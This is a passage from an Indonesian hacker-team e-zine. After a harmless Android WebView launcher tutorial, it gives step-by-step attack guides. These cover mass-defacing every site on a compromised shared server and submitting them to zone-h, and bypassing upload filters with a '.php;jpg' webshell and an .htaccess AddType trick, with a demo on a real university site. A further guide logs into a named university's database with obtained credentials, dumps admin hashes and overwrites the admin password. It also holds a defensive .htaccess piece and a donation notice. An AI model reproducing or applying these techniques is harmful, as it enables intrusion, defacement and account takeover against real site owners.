Nah kita browse lokasi folder sdk android kita seperti diatas lalu kita klik OK, restart Eclipse ya
1. Oke pengaturan SDK sudah, tapi eclipse kita ini belum bisa digunakan, masih ada satu lagi yaitu ADT
Plugin, ada duacara install ADT Plugin, pertama manual kita download file ADT Plugin, dan yang
kedua kita install lewat internet
Cara Pertama install manual, kita sudah download file ADT Plugin, jalankan eclipse lalu klik Help, selanjut
nya pilih Install New Software. Nanti akan munculseperti gambar dibawah

24
Setelah muncul tampilan diatas klik Add, maka akan tampil lagi tampilan seperti dibawah

Oke sekarang kita beri nama ADT Plugin, lalu kalian klik Archive dan browse file ADT Plugin yang sudah di
download. Klik OK, dan kita lakukan kebiasaan menginstall software yaitu klik Next sampai finish, jangan
lupa checklis semua yang diinstall. Ok cara pertama selesai.

Cara kedua, cara kedua tahap awal sama seperti cara pertama namun saat mengisi tampilan Add
Repository kita masukan link berikut:
http://dl-ssl.google.com/android/eclipse/

Selanjutnya kita lakukan hal yang sama seperti cara pertama, yang membedakan kita saat menginstall file
ADT Plugin baru di download.

Oke sesi installasi Eclipse sudah beres, sekarang kita kembali ke Topic utama yaitu membuat Aplikasi Web
launcher untuk HP Android. Langsung saja kita jalankan Eclipse.
- Kita buat project Android baru

25
Kita isi sesuai dengan aplikasi yang akan kitabuat, disini saya mengisi :
Application Name : Web Launcher
Project Name : Weblauncher
Package Name : com.view.weblauncher
Min Req SDK : sayapilih Android 2.2
Target SDK : sayapilih Android 2.3
Compile With : sayapilih Android 2.1
Theme : none

Ok kalau sudah diisi kita next, lalu kita tentuin bentuk icon aplikasi android kita, setelah kita tentukan,
selanjutnya kita buat class Activity, disini saya memberi nama activitynya Tampil.java sedangkan
Layoutnya main.xml .
Oke kalau sudah klik finish. Sekarang project baru kita sudah dibuat, pertama kita mulai dengan mengedit
Layout tampilan aplikasi kita yaitu file main.xml yang ada di folder res => Layout => main.xml

Nah kitaklik 2 kali file main.xml tersebut, dan kita edit seperti source dibawah

<LinearLayoutxmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
android:layout_width="fill_parent"
android:layout_height="fill_parent"
android:orientation="vertical">

<WebViewandroid:id="@+id/mainWebView"
android:layout_width="fill_parent"
android:layout_height="fill_parent"
/>
</LinearLayout>

Pertama saya akan jelaskan kenapa menggunakan LinearLayout karena jika kita menggunakan
RelativeLayout makaposisi content harus kita tentukan atas bawah, kanan kiri, sedangkan LinearLayout dia
akan mengisi space yang kosong ditambah dengan perintah android:orientation=”vertical” maka dia akan
menempati space yang kosong secara vertical atau kebawah. <WebView /> digunakan untuk
menampilkan tampilan web browser diaplikasi kita.

Oke Layout sudah beres sekarang kita atur Permition agar aplikasi yang kita buat dapat mengakses
internet, kita buka file AndroidManifest.xml lalu masukan perintah dibawah :

<uses-permissionandroid:name=”android.permission.INTERNET”/>

Oke dengan sekarang berarti aplikasi kita sudah dapat mengakses internet, kita lanjut lagi sekarang untuk
codingan yang utama, kita buka file Activity yang kita buat, tadi saya memberi nama Tampil.java file itu
berada di folder project_name =>src => Tampil.java, ok sekarang masukan source dibawah :
26
publicclassTampilextends Activity {

WebViewmainWebView = null;

@Override
protectedvoidonCreate(Bundle savedInstanceState) {
this.getWindow().requestFeature(Window.FEATURE_PROGRESS);
super.onCreate(savedInstanceState);
setContentView(R.layout.main);

mainWebView = (WebView) findViewById(R.id.mainWebView);

mainWebView.loadUrl("http://mobile.indonesianhacker.or.id/"); //URL Web kamu
mainWebView.setWebViewClient(newMainWebViewClient());

//Untukmenampilkan Progress Loading disaat Load halaman web

getWindow().setFeatureInt(Window.FEATURE_PROGRESS,
Window.PROGRESS_VISIBILITY_ON);

mainWebView.setWebChromeClient(newWebChromeClient() {
publicvoidonProgressChanged(WebView view, int progress) {
Tampil.this.setTitle("Loading...");
Tampil.this.setProgress(progress * 100);
if (progress == 100){
Tampil.this.setTitle(view.getTitle());
}
}
});

//Agar layardapatdi zoom

FrameLayoutmContentView = (FrameLayout)
getWindow().getDecorView().findViewById(android.R.id.content);
final View zoom = mainWebView.getZoomControls();
mContentView.addView(zoom, newFrameLayout.LayoutParams(
ViewGroup.LayoutParams.FILL_PARENT,
ViewGroup.LayoutParams.WRAP_CONTENT,
Gravity.BOTTOM));
zoom.setVisibility(View.GONE);
}
}
}

Ok source di atas terdapat beberapa bagian perintah :

mainWebView.setWebViewClient(newMainWebViewClient());
digunakan untuk menampilkan halaman web yang kita pa ggil di ai We Vie Layout ya g sudah
kita uat , lalu di a ah ya te dapat ethod aga saat kita eload hala a e aka u ul p og ess
seperti gambar dibawah :

27
Sebelum halaman web tampil aka nada pesan Loading seperti gambar diatas, jika proses Load sudah selesai
maka aplikasi akan menampilkan halaman web sesuai dengan URL yang kita masukan disini saya masukan
link IHT versi mobile http://mobile.indonesianhacker.or.id/, maka tampilannya akan seperti gambar
dibawah :

28
Jika kita sudah sampai sini sebenarnya aplikasi kita sudah selesai, tapi saya mau menambahkan Menu saat
kita menekan tombol menu atau options. Oke berarti kita lanjut pertama buka file strings.xml yang berada
di Nama_project => res => values => strings.xml

Lalu tambahkan source dibawah

<stringname="tentang">About Me</string>
<stringname="exit">Exit</string>
<stringname="pesan_tentang">Indonesian Hacker Team Launcher | Design by zenonk</string>
<stringname="ok">OK</string>
<stringname="app_exit">Exit</string>
<stringname="pesan_app_exit">Exit?</string>
<stringname="no">No</string>

Oke source diatas digunakan untuk memberikan nilai inputan pesan yang akan ditampilkan pada menu
yang akan kitabuat, selanjutnya kita buka kembali file activity kita yaitu Tampil.java Lalutambahkan source
dibawah :

@Override
publicbooleanonCreateOptionsMenu(Menu menu) {
// TODO Auto-generated method stub
menu.add(0,0,0, R.string.tentang);
menu.add(0,1,1, R.string.exit);
returnsuper.onCreateOptionsMenu(menu);
}

@Override
publicbooleanonOptionsItemSelected(MenuItem item) {
// TODO Auto-generated method stub

super.onOptionsItemSelected(item);

switch(item.getItemId()){
case 0:
bukaDialog();
break;
case 1 :
tutupDialog();
break;
}
returntrue;
}

privatevoidbukaDialog(){
newAlertDialog.Builder(this)
.setTitle(R.string.tentang)
.setMessage(R.string.pesan_tentang)
.setPositiveButton(R.string.ok,
newDialogInterface.OnClickListener() {

publicvoidonClick(DialogInterface dialog, int i) {

29
// TODO Auto-generated method stub

}
}).show();
}

privatevoidtutupDialog(){
newAlertDialog.Builder(this)
.setTitle(R.string.app_exit)
.setMessage(R.string.pesan_app_exit)
.setNegativeButton(R.string.no,
newDialogInterface.OnClickListener()
{
publicvoidonClick(DialogInterfacedialoginterface, int i)
{

}
})
.setPositiveButton(R.string.ok,
newDialogInterface.OnClickListener()
{
publicvoidonClick(DialogInterfacedialoginterface, int i)
{
finish();
}
})
.show();
}

Oke source diatas digunakan untuk menampilkan dua buah menu, yang pertama menu EXIT dan About, jadi saat
kita menekan tombol menu akan tampil menu seperti gambar dibawah :

30
Saat kitatekan menu About Me akan tampil pesan yang kita buat didalam file strings.xml

Sedangkan jika kita menekan menu exit akan tampil kotak pilihan exit seperti gambardibawah :

31
Oke sekian tutorial dari sayasemoga bermanfaat dan dapat dikembangkan untuk jadia plikasi web browser
seperti firefox atau chrome untuk android 

Written y : zenonk™

32
. Mass Deface

This A ti le is fo edu atio al pu poses o ly

Semua yang ada dalam artikel ini hanya untuk pembelajaran semata.

Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Massdeface
adalah: tindakan deface secara masal atau deface dalam jumlah yang banyak. misalnya kita berhasil masuk ke server
target (server linux) dan mendapatkan pada server target dengan directory:

/home/NamaServer/public_html/target.com/

coba klik di webshell naik dari directory /target.com/ ke /public_html/

jika kita mendapatkan nama-nama domain seperti dibawah ini

dan kita mendapatkan akses write permission (akses untuk membuat maupun meng-upload file) maka kita bisa
melakukan Massdeface dengan menggunakan tool php massdeface & zone-h submitter. Upload dulu file mass.php
dan index pepesannya nya ke server.

33
Panggil mass.php nya lalu hilangkan domain target.com nya misal jadi sampai folder /public_html/ saja. Jadinya
/home/NamaServer/public_html/

Udah kan, lengkapi saja sumber file yang akan dicopy ke semua folder domain yang ada di server itu misal Source
defacement Url: http://target.com/read.php

Lanjut output atau hasil copy-nya diberinama apa? Misal : read.php  ga berani hajar index , kasihan yang punya
website =))

Lanjut klik Execute dan tunggu sampai dapet URL hasilnya keluar pada table :p~
Kalo keluar berarti file pepesan read.php berhasil dicopy ke semua folder domain.

Dengan begitu kita sudah berhasil dengan CEPAT bukan Massdeface ke semua website dalam satu server
tersebut??? Lalu cara cek domain tersebut benar2 terdeface bagaimana?? Bisa di cek satu2, buka satu-satu di URL
juga silahkan. Lanjut teknik Cepat posting ke ZONE-H (http://zone-h.org). Copy semua yang ada pada table di atas
dan paste di Notepad++

34
Replace aja bagian /home/NamaServer/public_html/ dan ganti dengan http://

Dahkan cepet dapet semua nama domainnya =)) lanjut ke bagian submit nya , paste semua hasil nama domain itu ke
table submit. Tulis defacernya (ini wajib sudah terdaftar di zone-h ya) misal: r13y5h4 lalu setelah di paste semua
domainya tekan tombol submit.

Cek di Zone-H bagian Onhold sudah masuk atau belum kirimannya :p~
Ternyata sudah berhasil di SUBMIT di ZONE-H :p~

35
Sedikit Code:

$newfile=$dir.$file."/".$nameUrl;

if (!copy($defaceurl, $newfile)) {

echo "failed to copy $file...\n";

Code asalnya: if (!copy($file, $newfile))

Dari apa yang saya jelaskan diatas intinya cuma satu manfaatkan apa yang bisa dimanfaatkan, kalau bisa
menggunakan perintah COPY kenapa harus UPLOAD SATU-SATU, terus juga harus ngecek URL-nya satu-satu???
Kapan selesainya??? Keburu tua?

Ingat kata anak muda jaman sekarang “IAPA CEPAT DIA DAPAT jangan ingat kata simbah2 dulu ALON-ALON
WATON KELAKON , Karna dunia sudah semakin MAINSTREAM jadi kita harus melawan kalo tidak kita yang
dibumihanguskan =))

36
Kalau mau tool masdefacenya disini: http://pastebin.com/rYapDq3Z
Referensi: http://www.php.net/manual/it/function.copy.php

Nick : anharku a.k.a r13y5h4

Status : Just a Newbie
Home : http://codenesia.com
Email : [email protected]
FB : http://facebook.com/anharku
Tweet : @anharku

37
. Membuat Shell dengan Ekstensi .php;jpg
Mungkin ada yang pernah ngalamin, ketika udah berhasil masuk ke sebuah website dan mendapat akses admin, tapi
mentok karena gak bisa masukin shell yang biasa digunakan untuk mendeface website, kesel banget pasti.Memang
beberapa CMS melarang beberapa ekstensi seperti .php untuk diupload dengan alasan keamanan. Lah trus gimana
dong? Kalau gak bisa pakai ekstensi .php , kenapa gak bikin ekstensi lain?

Here we goo ...

Disini saya asumsikan anda sudah berhasil mendapat akses admin pada suatu website. Saya menggunakan sebuah
CMS yang tidak asing lagi sebagai contoh.

1. Pertama masuk ke halaman download untuk mengupload file shell kita, lalu klik Tambah Download

2. Setelah itu masukan judul, dan browse file shell anda. Disini saya menggunakan shell buatan anak bangsa,
favorit sejuta umat, Kodok Lompat
3. Lalu klik simpan untuk mengupload file. Tunggu beberapa saat dan lihat apa yang terjadi.

Ups ! File gagal diupload .. Server tidak mengizinkan file dengan ekstensi .php untuk diupload. Lalu bagaimana?? Kita
coba sekali lagi dengan memberi sedikit perubahan. Rename file kodok.php menjadi kodok.php;jpg

Lalu upload kembali file tersebut ..

38
Nah .. Berhasil tuh .. Kodok kita sudah masuk ke direktorinya.

Oke, sekarang coba kita eksekusi ..

Buka www.target.com/files/kodok.php;jpg

Ternyata tampilannya seperti ini :

Wah, ternyata shell kita dieksekusi sebagai file .txt . Kalo gitu gak bisa digunakan untuk deface dong ? Jangan
khawatir, sekarang kita tinggal membuat agar shell kita dieksekusi sebagai file PHP oleh server. Caranya adalah
dengan membuat .htaccess

1. Buka teks editor, ane sih pake notepad

2. Masukan script berikut : AddType application/x-httpd-php .php;jpg
3. Save dengan nama .htaccess
4. Upload file tersebut seperti kita mengupload shell tadi
5. Buka kembali shell kita, www.target.com/files/kodok.php;jpg

Dan, taraaaaaa.... Muncul lah si kodok lompat

39
demo : http://sastra.unkhair.ac.id/files/kodok.php;jpg

Note : Anda bisa menggunakan berbagai ekstensi, tidak hanya .php;jpg

Sekian thread dari saya, semoga bermanfaat ... 

./ written by xevil

40
. Disable php Dengan .htaccess
Artikel ini hanya iseng2 belaka jika ada kesamaan judul, isi materi maupun tokoh pelakunya maka itu hanya
kebetulan saja =))

Langsung saja, Sudah tahu webshell kan? Webshell atau backdoor yang digunakan sebagai pintu belakang kita untuk
mengakses ke server target kapan saja. Nah biasanya webshell atau backdoor ini dibuat dengan pemrograman PHP.
Disini saya hanya akan menjelaskan bagaimana cara mendisable file .php di server dengan menggunakan .htaccess
saja. File .htaccess adalah file konfigurasi yang disediakan oleh web server apache, yang biasanya digunakan untuk
mengubah settingan default dari apache.

Syarat: server linux dengan software: Apache

Memiliki vuln di sebuah form upload misal images/tmp/ tanpa filter untuk file .php
Buat sebuah file dengan nama .htaccess dengan code sebagai berikut:

RemoveHandler .php .php3 .php4 .php5 .php6 .phps

RemoveType .php .php3 .php4 .php5 .php6 .phps
AddType text/plain .php .php3 .php4 .php5 .php6 .phps
AddHandler text/plain .php .php3 .php4 .php5 .php6 .phps
php_flag engine off

upload file .htaccess pada directory dimana terdapat vuln tersebut misal di folder tmp

Setelah upload file htaccess coba buka file webshell / backdoor yang telah diupload oleh seorang attacker. Misal
hrrp:// target.com/images/tmp/chain-1359612196.php

Maka file webshell / backdoor tersebut akan ditampilkan sebagai file text seperti berikut.

41
Mengapa demikian?

Karena file dalam file .httacces telah kita tuliskan code yang berfungsi untuk menonaktifkan server-side parsing
script seperti PHP yaitu RemoveHandler, RemoveType, AddType text/plain (menambahkan daftar tipe file agar
dieksekusi menjadi text/plain text), AddHandler text/plain & php_flag engine off (mematikan PHP parsing pada
sebuah direktori).

Cara diatas bisa kita gunakan untuk ngisengin attacker, pas dia panggil tuyulnya eh tu tuyul sudah ga bisa kerja lagi
sudah digembok tangan2nya =))

sekian penjelasan dari saya semoga ada manfaatnya 

salam

referensi: http://php.net/manual/en/apache.configuration.php

Nick : anharku a.k.a r13y5h4

Join Date IH : May 2010
Status : Just a Newbie
Home : http://codenesia.com
Email : [email protected]
FB : http://facebook.com/anharku
Tweet : @anharku

42
. Remote SQL
Note : Artikel ini dibuat untuk pengetahuan semata. Bukan bermaksud merendahkan, menjelek-jelekan, atau hal
negatif lainnya. Sebelumnya saya mohon maaf bila ada pihak yang tidak senang dengan artikel yang saya buat, sekali
lagi, ini hanya untuk pengetahuan dan pembelajaran semata.

Apa itu remote SQL? Remote, artinya mengendalikan dari jarak jauh, Remote SQL brarti mengendalikan database
SQL dari jarak jauh  hehe udah itu aja penjelasaanya.

Biar gak pusing kita langsung praktek Remote SQL aja ya =))

Anggaplah saya mendapat user dan password database dari suatu tempat, gak tau darimana hehe. Untuk artikel ini,
saya akan memperlihatkan secara blak-blakan dari target kita. Sebelumnya mohon maaf bila ada yang tidak senang


Disini saya mempunyai target server salah satu Universitas di Indonesia, STIKI.

Host : sql.stiki.ac.id
User db : stiki_portal
Nama db : stiki_portal
Pass : ****************

Untuk melakukan Remote SQL, saya menggunakan software bernama Vertrigoserv. Bisa didownload di Google 

Secara Default, Aplikasi ini terinstall di partisi C:\ ( pada windows )

Langkah pertama, buka command prompt ( cmd )

Lalu masuk ke direktori mysql di Vertrigoserv, caranya ketik :

cd C:\Program Files\Vertrigoserv\Mysql\bin

43
Langkah ke-2, kita mulai koneksi ke Mysql Server, berikut commandnya :

mysql –h host –u username –p db name

Lalu asuka Pass o d, da tu ggu sa pai ada pesa Wel o e to Mys l Mo ito

Jika sudah ada pesan seperti di atas, brarti kita sudah berhasil masuk ke database target, wuehehe :D

Oke, sekararang kita intip tabelnya, ketik :

show tables;

44
Wah ada banyak banget tabelnya :D , dari nama tabelnya kita bisa tau kalo website target kita menggunakan
MEMHT Portal sebagai CMS nya. Lalu selanjutnya kita cari tahu, dimana tabel yang berisi user dan password admin,
sehingga kita bisa login ke situs target.

Ka a i i e ggu aka MEMHT Po tal, e a ti use a e da pass o d e ada di ta el e ht_ute ti

Untuk memastikan, kita liat kolum apa saja yang ada di tabel memht_utenti, ketik :

desc memht_utenti;

Nahhh bener kan, ada tuh tabel user ama passnya :D

45
Oke, selanjutnya kita intip isinya, ketik :

select * from memht_utenti;

Wuehehehe bener kan, keliatan tuh username ama password adminnya 

Ane ambil salah satu buat loginnya, ane ambil yang :

roni : 98a2b90f89fc693f50796d095d97a79b

Waduh puyeng juga kalo harus decrypt md5, daripada susah-susah mending direplace aja hehe
Untuk mereplacenya, kita gunakan comand update :

update (table_name) set column_name="password" where id = (id)

Sebelumnya kita siapkan dulu hash md5nya, biar gampang ane ganti passnya jadi 12345, dan md5 nya berarti
827ccb0eea8a706c4c34a16891f84e7b

Lalu commandnya menjadi seperti ini :

update (memht_utenti) set pass="827ccb0eea8a706c4c34a16891f84e7b" where id = (64);

Lalu tekan enter

46
Nah berhasil tuh =))

Sekarang kita coba login ke websitenya, masuk ke http://stiki.ac.id/admin.php

Masukan user dan password : roni : 12345

47
Jreng jreeengg ... masuk lah kita ke admin panelnya =)) setelah itu, terserah deh mau diapain :p

Sekian artikel cupu dari saya, semoga bermanfaat. Sekali lagi jadikan ini sebagai pengetahuan semata, jangan
gunakan untuk melakukan tindakan yang merugikan orang lain, mohon maaf bila bahasa yang saya gunakan agak
sulit dipahami hehe.. salam jomblo =))

./ written by xevil

48
. Mass Deface [2]
This A ti le is fo edu atio al pu poses o ly
Semua yang ada dalam artikel ini hanya untuk pembelajaran semata.

H … kok ada a gka [2] nya? Ia ini sambungan dari artikel massdeface yang pertama. Kali ini artikel ini membahas
bagaimana kalo server yang kita massdeface tidak berupa folder nama domain. Lihat lagi artikel pertama dimana
path nya /home/NamaServer/public_html/target.com/

Dan yang kali ini hanya nama folder saja biasanya patnya

/home/NamaServer/public_html/target/

bisa saja namanya menggunakan nama domain, maupun nama2 lain namun tetap saja kita bingung apa nama
domainnya? Apakah .com , .net ,.biz , go.id dan lain2?

Terlebih dahulu upload pepesan pakai tool php massdeface & zone-h submitter seperti artikel sebelumnya.

lalu cara mengetahui alamat URL / domain targetnya yaitu;

1. Misal targetnya adalah CMS Wordpress

Cara CEPATnya adalah dengan melihat isi dari file sitemap.xml

49
Apa itu sitemap? Sitemap atau Peta Situs adalah cara mudah bagi webmaster untuk memberitahu mesin pencari
tentang halaman di situs mereka yang tersedia. Dalam bentuk yang paling sederhana, Sitemap adalah file XML yang
berisi daftar URL untuk situs bersama dengan metadata tambahan tentang setiap URL (ketika terakhir diperbarui,
seberapa sering biasanya perubahan, dan betapa pentingnya, relatif terhadap URL lainnya di situs ) sehingga mesin
pencari dapat lebih cerdas menjelajah situs. Web crawler biasanya menemukan halaman dari link dalam situs dan
dari situs lain. Peta Situs melengkapi data ini untuk memungkinkan crawler yang Peta Situs dukungan untuk
mengambil semua URL di Sitemap dan belajar tentang semua URL yang menggunakan metadata yang terkait.
Menggunakan protokol Sitemap tidak menjamin bahwa halaman web yang dimasukkan dalam mesin pencari, tetapi
memberikan petunjuk untuk crawler web untuk melakukan pekerjaan yang lebih baik merangkak situs anda.
Mungkin sitemap merupakan salah satu cara naikin rating SEO juga nih :p~

Nah dapat sudah URL TARGET yang berada diantara tag <loc> loc =location = lokasi yaitu:
http://www.penissizegenetics.net ,wagh URLnya maho banget 

50
Cek dulu URLnya.

Nah benar saja, nama websitenya sesuai dengan isinya yaitu alat u tuk e pe esa ANU agh kayak ak EROR
eh Mak EROT aja tuh =))

Lanjut cek hasil Upload pepesan

51
Yes, bener berarti memang benar URL Target dengan domain tersebut masih idup.

Cara ke2.

Login ke SQL lalu cek di bagian post / posting

Cara ini agak sedikit memakan waktu tapi gpp yang penting dapet apa yang kita mau :p Misal di wp kita harus
mendapatkan informasi berupa MySQL database username, password, & hostname (DB_NAME, DB_USER,
DB_PASSWORD, DB_HOST) informasi ini bisa kita dapatkan pada file config, kalo di Wordpress nama filenya wp-
config.php

Nah setelah kita dapat data diatas saatnya login ke SQL pakai webshell kita.

Setelah login pilih table wp-post

52
Lihat postingannya apaan? Geser ke sebelah kanan sampai keluar alamat URL/ Domain targetnya.

Dapet deh alamat targetnya 

Untuk joomla bisa juga pakai cara login SQL ini, Cuma datanya di file configuration.php, untuk cms lainnya mungkin
nama filenya config.php

Klo di joomla cara cepatnya biasanya buka file configuration.php lihat variable $mailfrom biasanya nih alamat email
pakai nama domain dari website tersebut. Atau kalau ga cari keterangan sitename lalu cari digoogle dengan kata2
yang ada di sitename tersebut pasti dapet tuh domainnya . Mungkin kalian bisa kembangkan cara2 lainnya misal
dengan domain lookup, atau dengan trace domain yang sehosting, dengan cara pakai tool RitX.pl dan masih banyak
lagi JALAM MENUJU ROMA =))

Catatan: Sebagai webserver seharusnya lebih hati2 dalam memberikan akses pada domain2 yang dikelolanya,
jangan memberikan hak akses 777 drwxrwxrwx pada folder domain itu akan memudahkan pentester untuk
meloncat dari satu folder ke folder domain lainnya. Memudahkan pentester menanam webshell di domain lain yg
masih dalam 1 server.

Referensi:

http://www.sitemaps.org
http://wordpress.org/extend/plugins/google-sitemap-generator/
http://en.wikipedia.org/wiki/Sitemaps

Nick : anharku a.k.a r13y5h4

Status : Just a Newbie
Home : http://codenesia.com
Email : [email protected]
FB : http://facebook.com/anharku
Tweet : @anharku

53
. Donasi Indonesian Hacker

Sebelumnya kami mengucapkan banyak terima kasih kepada rekan-rekan yang telah bergabung ke forum Indonesian
Hacker disini kami memberikan kesempatan kepada rekan-rekan semua untuk berpartisipasi demi memajukan
forum sebagai DONATUR IH.
Apa saja keuntungan yang di dapat dari donasi adalah :

- Pada akhir nickname terdapat simbol $

- Title standar yang bertulisan I-HaCker's Donator
- Anda dapat mengganti Title Anda sendiri
- Rank VIP Member
- Tanpa Iklan
- Thread khusus Donatur
- Dapat merubah foto anda dengan ukuran yang lebih besar dari standar ukuran max 180x240
- Dapat Membuat Signature
- Dapat Menghapus Thread Anda sendiri
- Dapat Menghapus Post Anda sendiri
- Dapat Membuka dan Menutup Thread Anda sendiri
- Maximum Created Groups 50
- Dapat Menghapus Grup Anda sendiri
- Dapat Menghapus Event Anda
- Ukuran Max Album Pictures 800 pixels
- Maximum Number of Album Pictures 1000
- Dapat Menghapus Album Foto Anda
- Dapat Menghapus Komentar Album Foto
- Dapat Menghapus Visitor Messages
- Dapat Invisible Mode ID Anda
- Maximum Stored Messages 1000

Untuk sementara yang sudah kami sediakan seperti itu dan yang lain2 masih dalam perkembangan.

Kenapa donasi kami butuhkan tiada lain hanyalah untuk kepentingan bersama diantaranya :
- untuk perawatan server demi kenyamanan member
- biaya pengembangan forum
- dll

54
Donasi dapat di lakukan dengan cara
1. via Rekening minimal Rp.50ribu sampai tak terbatas
(silahkan PM angga untuk lengakapnya,,)
Donasi melalui rekening:
Bank BCA
Nomor Rekening 2830506104
Kantor Cabang KCP Ujung Berung Bandung
Nama Pemilik Rekening Subhanjaya Angga Atmaja
Bank MANDIRI
Nomor Rekening 131-00-0750642-3
Kantor Cabang KCP Ujung Berung Bandung
Nama Pemilik Rekening Subhanjaya Angga Atmaja

Catatan :
bagi yang sudah donasi harap konfirmasi atau yang belum mendapatkan akses di atas melalui Staff yg sedang online
atau melalui email [email protected]
** sistem donasi sewaktu2 dapat berubah menyesuaikan dengan perkembangan,,

Terimakasih atas partisipasinya,,,

Salam
Indonesian Hacker Team

55